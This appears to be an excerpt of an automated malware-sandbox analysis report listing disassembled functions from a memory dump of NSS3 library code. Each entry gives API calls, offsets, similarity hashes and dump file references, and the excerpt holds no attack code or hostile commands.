Instruction Fuzzy Hash: 19312975600201AFE7309F2CCC447A637B4FB46755F140929E85AC7A51DB35E894C7F2

Function 6CA844D0 Relevance: 7.6, APIs: 5, Instructions: 90COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3 ref: 6CA844FF

Part of subcall function 6CAE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CA88298,?,?,?,6CA7FCE5,?), ref: 6CAE07BF
Part of subcall function 6CAE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CAE07E6
Part of subcall function 6CAE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAE081B
Part of subcall function 6CAE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAE0825

SECOID_FindOID_Util.NSS3(?), ref: 6CA84524
SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6CA84537
CERT_AddExtensionByOID.NSS3(00000001,?,?,?,00000001), ref: 6CA84579

Part of subcall function 6CA841B0: PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6CA841BE
Part of subcall function 6CA841B0: PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CA841E9
Part of subcall function 6CA841B0: SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6CA84227
Part of subcall function 6CA841B0: SECITEM_CopyItem_Util.NSS3(?,-00000018,?), ref: 6CA8423D

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA8459C

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Error$Alloc_ArenaCopyFindHashItem_LookupTable$ConstEqual_ExtensionItems
String ID:
API String ID: 3193526912-0
Opcode ID: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction ID: 27005d969d758fd96b5c34f28ff04da9df154f2f31314f5dc49d581b58db56b5
Opcode Fuzzy Hash: ebf86faa50ffcf2ec35f4368ae81f486fcdccb540a5d46777f353d11653d57bb
Instruction Fuzzy Hash: ED21C7716436009BE718CA65AC54B6F77AD9F4165CF180428AC198BAC1EB21ED84C691

Function 6CA86AF0 Relevance: 7.6, APIs: 5, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(00000000,6CA8B21D,00000000,00000000,6CA8B219,?,6CA86BFB,00000000,?,00000000,00000000,?,?,?,6CA8B21D), ref: 6CA86B01

Part of subcall function 6CADFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CADFE08
Part of subcall function 6CADFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CADFE1D
Part of subcall function 6CADFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CADFE62

PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,6CA8B219,?,6CA86BFB,00000000,?,00000000,00000000,?,?,?,6CA8B21D), ref: 6CA86B36
PORT_ArenaAlloc_Util.NSS3(00000000,00000030), ref: 6CA86B47
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CA86B8A
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000004,?,0000001C), ref: 6CA86BB6

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Item_$DecodeQuick$Errormemcpy
String ID:
API String ID: 1773792728-0
Opcode ID: 091ff517d1d137ec27ce5ad43ec9fa45f927ebb26943aabea3491f7a1a6f5026
Instruction ID: dd5a8a6bb649ef45358887e59f9baae51767673610c9c3c0a77e223a67a0bb8c
Opcode Fuzzy Hash: 091ff517d1d137ec27ce5ad43ec9fa45f927ebb26943aabea3491f7a1a6f5026
Instruction Fuzzy Hash: 272124319622145BFB108F60DD04F9A7BA8DB45B9CF094629EC08CBB51F731EA848790

Function 6CAF4BB0 Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,C083F089), ref: 6CAF4BDD

Part of subcall function 6CAE0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA887ED,00000800,6CA7EF74,00000000), ref: 6CAE1000
Part of subcall function 6CAE0FF0: PR_NewLock.NSS3(?,00000800,6CA7EF74,00000000), ref: 6CAE1016
Part of subcall function 6CAE0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA887ED,00000008,?,00000800,6CA7EF74,00000000), ref: 6CAE102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000001,?,C083F089), ref: 6CAF4C03

Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE10F3
Part of subcall function 6CAE10C0: EnterCriticalSection.KERNEL32(?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE110C
Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1141
Part of subcall function 6CAE10C0: PR_Unlock.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1182
Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE119C

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,C083F089), ref: 6CAF4C15
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,C083F089), ref: 6CAF4C3E

Part of subcall function 6CADF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6CADF0C8
Part of subcall function 6CADF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CADF122

PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,C083F089), ref: 6CAF4C85

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena_$ArenaFree$Value$Alloc_AllocateCriticalEncodeEnterInitItem_LockPoolSectionUnlockcallocmemset
String ID:
API String ID: 227267669-0
Opcode ID: 4258e23900e067b35bc30ba3184d7342688e19a9ce987c5fe54cceffcd531f73
Instruction ID: f1138299de328be73dcd30875f78c604683218e9581d19a87ad87d6907e93f8c
Opcode Fuzzy Hash: 4258e23900e067b35bc30ba3184d7342688e19a9ce987c5fe54cceffcd531f73
Instruction Fuzzy Hash: 182108B3A002116BEB100F559E41BAB36A8DF4539CF090134FD38D7791F731D89A86E1

Function 6CAF68A0 Relevance: 7.6, APIs: 5, Instructions: 79COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6CAF68B4

Part of subcall function 6CB49090: TlsGetValue.KERNEL32 ref: 6CB490AB
Part of subcall function 6CB49090: TlsGetValue.KERNEL32 ref: 6CB490C9
Part of subcall function 6CB49090: EnterCriticalSection.KERNEL32 ref: 6CB490E5
Part of subcall function 6CB49090: TlsGetValue.KERNEL32 ref: 6CB49116
Part of subcall function 6CB49090: LeaveCriticalSection.KERNEL32 ref: 6CB4913F

Part of subcall function 6CA70F00: PR_GetPageSize.NSS3(6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F1B
Part of subcall function 6CA70F00: PR_NewLogModule.NSS3(clock,6CA70936,FFFFE8AE,?,6CA016B7,00000000,?,6CA70936,00000000,?,6CA0204A), ref: 6CA70F25

PR_MillisecondsToInterval.NSS3(?), ref: 6CAF68E6
PR_MillisecondsToInterval.NSS3(?), ref: 6CAF6938
PR_MillisecondsToInterval.NSS3(?), ref: 6CAF6986
PR_ExitMonitor.NSS3(?), ref: 6CAF69BA

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: IntervalMillisecondsValue$CriticalEnterMonitorSection$ExitLeaveModulePageSize
String ID:
API String ID: 1802314673-0
Opcode ID: d7cdd5edcadc18813b2fd487546040c2961220b52b9faff1a631b6399893ba54
Instruction ID: 785ca660fc28bd15a95265ef8bd5ee70688d78ee19fa8b0b9deb41c5e3dc01a0
Opcode Fuzzy Hash: d7cdd5edcadc18813b2fd487546040c2961220b52b9faff1a631b6399893ba54
Instruction Fuzzy Hash: 4631D631600901EBDB145BB4ED483D6B774BF4534AF080229E82992751DB3538E9CFD3

Function 6CA8AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6CA83FFF,00000000,?,?,?,?,?,6CA81A1C,00000000,00000000), ref: 6CA8ADA7

Part of subcall function 6CAE14C0: TlsGetValue.KERNEL32 ref: 6CAE14E0
Part of subcall function 6CAE14C0: EnterCriticalSection.KERNEL32 ref: 6CAE14F5
Part of subcall function 6CAE14C0: PR_Unlock.NSS3 ref: 6CAE150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CA83FFF,00000000,?,?,?,?,?,6CA81A1C,00000000,00000000), ref: 6CA8ADB4

Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE10F3
Part of subcall function 6CAE10C0: EnterCriticalSection.KERNEL32(?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE110C
Part of subcall function 6CAE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1141
Part of subcall function 6CAE10C0: PR_Unlock.NSS3(?,?,?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE1182
Part of subcall function 6CAE10C0: TlsGetValue.KERNEL32(?,6CA88802,00000000,00000008,?,6CA7EF74,00000000), ref: 6CAE119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6CA83FFF,?,?,?,?,6CA83FFF,00000000,?,?,?,?,?,6CA81A1C,00000000), ref: 6CA8ADD5

Part of subcall function 6CADFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAD8D2D,?,00000000,?), ref: 6CADFB85
Part of subcall function 6CADFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CADFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CBA94B0,?,?,?,?,?,?,?,?,6CA83FFF,00000000,?), ref: 6CA8ADEC

Part of subcall function 6CADB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBB18D0,?), ref: 6CADB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA83FFF), ref: 6CA8AE3C

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: d0593fc788ab928b0f74f307b36255d88cf9fa109ffdfe8c22213abe8bae206b
Instruction ID: 93712703075d69fceb9fd6d0809a40c6e6e7d9a6509d00d0789cc74591deb0d0
Opcode Fuzzy Hash: d0593fc788ab928b0f74f307b36255d88cf9fa109ffdfe8c22213abe8bae206b
Instruction Fuzzy Hash: 6D113871E003145BF7109B659C41BBF73F8DF9524DF088628ED5996781FB20E99D82E2

Function 6CAA8E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6CAC2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA94F1C), ref: 6CAA8EA2

Part of subcall function 6CACF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CACF854
Part of subcall function 6CACF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CACF868
Part of subcall function 6CACF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CACF882
Part of subcall function 6CACF820: free.MOZGLUE(04C483FF,?,?), ref: 6CACF889
Part of subcall function 6CACF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CACF8A4
Part of subcall function 6CACF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CACF8AB
Part of subcall function 6CACF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CACF8C9
Part of subcall function 6CACF820: free.MOZGLUE(280F10EC,?,?), ref: 6CACF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6CAC2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA94F1C), ref: 6CAA8EC3
TlsGetValue.KERNEL32(?,?,?,6CAC2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA94F1C), ref: 6CAA8EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6CAC2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAA8EF1
PR_Unlock.NSS3 ref: 6CAA8F20

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID:
API String ID: 1978757487-0
Opcode ID: cbb67040b51fd08887a3cb477a90687fa3f920f67d7b997da20af9c28e7e989c
Instruction ID: da4531115f91c30f06a67da75bb8d60ad22ebf94bd0ad02e37c0bfa60051cec3
Opcode Fuzzy Hash: cbb67040b51fd08887a3cb477a90687fa3f920f67d7b997da20af9c28e7e989c
Instruction Fuzzy Hash: 41219C70A096459FC700AF68D58419DBBF0FF08318F05856EE8988BB41D730E895CBC2

Function 6CAD8970 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,6CA861C4,?,6CA85639,00000000), ref: 6CAD8991
TlsGetValue.KERNEL32(?,?,?,?,?,6CA85639,00000000), ref: 6CAD89AD
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CA85639,00000000), ref: 6CAD89C6
PR_WaitCondVar.NSS3 ref: 6CAD89F7
PR_Unlock.NSS3(?,?,?,?,?,?,?,6CA85639,00000000), ref: 6CAD8A0C

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: f2177873ae6d7f459abbbf30ac07089b1a78cb17951ade67c394b6abe6804313
Instruction ID: 9d3e1b95f03f88b14944bed74e8e0f085b8a1879f5f2b14ccb423e5f2f894331
Opcode Fuzzy Hash: f2177873ae6d7f459abbbf30ac07089b1a78cb17951ade67c394b6abe6804313
Instruction Fuzzy Hash: 31219FB49047198FCB00AFB8C5841AABBF4FF06318F165666DC9897615E730E4D4CBD2

Function 6CAD8800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD8821
TlsGetValue.KERNEL32(?,?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD883D
EnterCriticalSection.KERNEL32(?,?,?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD8856
PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CAD8887
PR_Unlock.NSS3(?,?,?,?,6CAE085A,00000000,?,6CA88369,?), ref: 6CAD8899

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: 8d5552e4417deefce31cdce6226c564ade881a00aa5e93f4992b346626a5597c
Instruction ID: f7d274df0f2df2a6844dfaa1fc25d11040fae64bd58621e315a315d954c05821
Opcode Fuzzy Hash: 8d5552e4417deefce31cdce6226c564ade881a00aa5e93f4992b346626a5597c
Instruction Fuzzy Hash: 00217CB4A046058FDB00AF78C58816EBBF4FF05388F15566ADC9497601E730E4D4CBD2

Function 6CAA28A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6CA980DD), ref: 6CAA28BA
EnterCriticalSection.KERNEL32(?,?,?,?,6CA980DD), ref: 6CAA28D3
PR_Unlock.NSS3(?,?,?,?,?,6CA980DD), ref: 6CAA28E8
DeleteCriticalSection.KERNEL32(?,?,?,?,?,6CA980DD), ref: 6CAA290E
free.MOZGLUE(?,?,?,?,?,?,6CA980DD), ref: 6CAA291A

Part of subcall function 6CA99270: DeleteCriticalSection.KERNEL32(?,?,6CAA5089,?,6CAA3B70,?,?,?,?,?,6CAA5089,6CA9F39B,00000000), ref: 6CA9927F
Part of subcall function 6CA99270: free.MOZGLUE(?,?,6CAA3B70,?,?,?,?,?,6CAA5089,6CA9F39B,00000000), ref: 6CA99286
Part of subcall function 6CA99270: PL_HashTableDestroy.NSS3(?,6CAA3B70,?,?,?,?,?,6CAA5089,6CA9F39B,00000000), ref: 6CA99292

Part of subcall function 6CA98B50: TlsGetValue.KERNEL32(00000000,?,6CAA0948,00000000), ref: 6CA98B6B
Part of subcall function 6CA98B50: EnterCriticalSection.KERNEL32(?,?,?,6CAA0948,00000000), ref: 6CA98B80
Part of subcall function 6CA98B50: PL_FinishArenaPool.NSS3(?,?,?,?,6CAA0948,00000000), ref: 6CA98B8F
Part of subcall function 6CA98B50: PR_Unlock.NSS3(?,?,?,?,6CAA0948,00000000), ref: 6CA98BA1
Part of subcall function 6CA98B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6CAA0948,00000000), ref: 6CA98BAC
Part of subcall function 6CA98B50: free.MOZGLUE(?,?,?,?,?,6CAA0948,00000000), ref: 6CA98BB8

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
String ID:
API String ID: 3225375108-0
Opcode ID: ac9771531427c78eedfe5d0a904250c354a7493cb36002ee0d1b17eb118683c7
Instruction ID: 35eb5a0e4042d0a048fb2fecda6fab4ed0106d5df553031110b2e48dee7526dd
Opcode Fuzzy Hash: ac9771531427c78eedfe5d0a904250c354a7493cb36002ee0d1b17eb118683c7
Instruction Fuzzy Hash: B4210CB5A04B059FDB00AFB8C189569BBF4FF05354F054A69DC9897700EB34E8E9CB92

Function 6CA709E0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,?,6CA706A2,00000000,?), ref: 6CA709F8
malloc.MOZGLUE(0000001F), ref: 6CA70A18
memcpy.VCRUNTIME140(?,?,00000001), ref: 6CA70A33

Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707AD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707CD
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA0204A), ref: 6CA707D6
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA0204A), ref: 6CA707E4
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,6CA0204A), ref: 6CA70864
Part of subcall function 6CA707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA70880
Part of subcall function 6CA707A0: TlsSetValue.KERNEL32(00000000,?,?,6CA0204A), ref: 6CA708CB
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708D7
Part of subcall function 6CA707A0: TlsGetValue.KERNEL32(?,?,6CA0204A), ref: 6CA708FB

PR_Free.NSS3(?), ref: 6CA70A6C
PR_Free.NSS3(?), ref: 6CA70A87

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Value$Freecalloc$mallocmemcpy
String ID:
API String ID: 207547555-0
